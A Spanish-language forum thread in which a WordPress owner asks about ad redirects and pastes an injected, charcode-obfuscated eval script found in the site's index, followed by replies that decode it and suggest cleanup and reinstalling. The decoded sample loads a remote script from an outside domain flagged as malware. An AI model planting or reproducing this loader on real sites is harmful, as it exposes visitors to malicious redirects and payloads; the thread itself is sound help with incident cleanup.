Redirección a publicidad en mi WordPress

  • Autor Autor javierjc1010
  • Fecha de inicio Fecha de inicio

javierjc1010

Curioso
Verificado por Whatsapp
¡Usuario con pocos negocios! ¡Utiliza siempre saldo de Forobeta!
Hola comunidad mucho gusto desde ayer mi wordpress se redireccioana a sitios de publicidad, observando el codigo del index observe esta linea de codigo.

eval(String.fromCharCode(118,97,114,32,112,115,100,100,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,34,115,99,114,105,112,116,34,41,59,32,118,97,114,32,119,97,110,116,109,101,101,32,61,32,102,97,108,115,101,59,102,111,114,32,40,118,97,114,32,105,32,61,32,48,59,32,105,32,60,32,112,115,100,100,46,108,101,110,103,116,104,59,32,105,43,43,41,32,123,32,32,32,105,102,32,40,112,115,100,100,91,105,93,46,105,100,41,32,123,32,32,32,9,32,105,102,32,40,112,115,100,100,91,105,93,46,105,100,32,61,61,32,34,115,108,101,99,116,114,101,112,111,105,110,116,34,41,123,32,9,9,119,97,110,116,109,101,101,61,116,114,117,101,59,32,9,32,125,32,32,32,125,32,32,125,105,102,40,119,97,110,116,109,101,101,61,61,102,97,108,115,101,41,123,32,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,105,100,61,34,115,108,101,99,116,114,101,112,111,105,110,116,34,59,115,46,115,114,99,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,48,44,49,48,49,44,49,49,57,44,49,49,53,44,52,54,44,49,49,57,44,49,48,49,44,57,55,44,49,49,54,44,49,48,52,44,49,48,49,44,49,49,52,44,49,49,50,44,49,48,56,44,49,48,56,44,49,48,56,44,57,55,44,49,49,54,44,49,48,50,44,49,49,49,44,49,49,52,44,49,48,57,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,57,57,44,49,49,49,44,49,49,55,44,49,49,48,44,49,49,54,44,49,48,49,44,49,49,52,44,49,49,53,44,52,54,44,49,48,54,44,49,49,53,44,54,51,44,49,49,56,44,54,49,44,52,57,44,52,57,44,52,54,44,53,48,44,53,49,41,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,32,125));</script>

lo que no logro es encontrar la ruta

ya he desactividado plugin hecho de todo
 
Hola, a mi eso me suena a que te han hackeado el sitio y eso que muestras puede ser código malicioso encriptado.
Si tu hosting hace backups de tu sitio yo probaria a usar una anterior al problema.
 
Es inyección como bien indican los compañeros.
Si estas en un server con plesk o cpanel pasale un escaner antimalware.
Como inmunify360 te sacara los archivos infectados y la ultima fecha de modificación .
Te ayudara a restaurar a unos dias antes por ejemplo.
Lo más recomendable es instalación nueva de wordpres a la ultima version y plugins y temas actualizados e importar la base de datos y uploads.

Un saludo
 
Hola comunidad mucho gusto desde ayer mi wordpress se redireccioana a sitios de publicidad, observando el codigo del index observe esta linea de codigo.


lo que no logro es encontrar la ruta

ya he desactividado plugin hecho de todo

Ese código genera un script, donde descarga un script de otra pagina (mi avast antivirus detecta esa pagina como malware y así que no pude comprobar que hace)
JavaScript:
var psdd = document.getElementsByTagName("script");
var wantmee = false;
for (var i = 0; i < psdd.length; i++) {
    if (psdd[i].id) {
        \
        t
        if (psdd[i].id == "slectrepoint") {
            \
            t\ twantmee = true;\
            t
        }
    }
}
if (wantmee == false) {
    \
    tvar d = document;
    var s = d.createElement('script');
    s.id = "slectrepoint";
    s.src = "https://news.weatherplllatform.com/counters.js?v=11.23";
    if (document.currentScript) {
        document.currentScript.parentNode.insertBefore(s, document.currentScript);
    } else {
        d.getElementsByTagName('head')[0].appendChild(s);
    }
}
 
Parece que inserta publicidad en tu sitio web
 
Vas a tener que revisar y limpiar cada archivo de WordPress, de preferencia re-instalar WP para más fácil, pero habría de identificar como fue que te metieron ese código.

Usaste algún theme o plugin nulled?
 
Y alguien sabe como hacer para que facebook ya no me detecte como virus la pagina
 
Y alguien sabe como hacer para que facebook ya no me detecte como virus la pagina

Te toca analizar todo el sitio y limpiarlo u otro caso hacer todo de nuevo y te evitas el estar revisando parte por parte y si no tienes experiencia mejor.
A mi me ha pasado pero he podido limpiar con la ayuda de los proveedores de mi hosting que me dicen exactamente donde está el problema, pero en otros casos he decidido eliminar el sitio web completo para en un futuro hacerlo desde 0

Saludos.
 
como descifran ese codigo para obtener esto?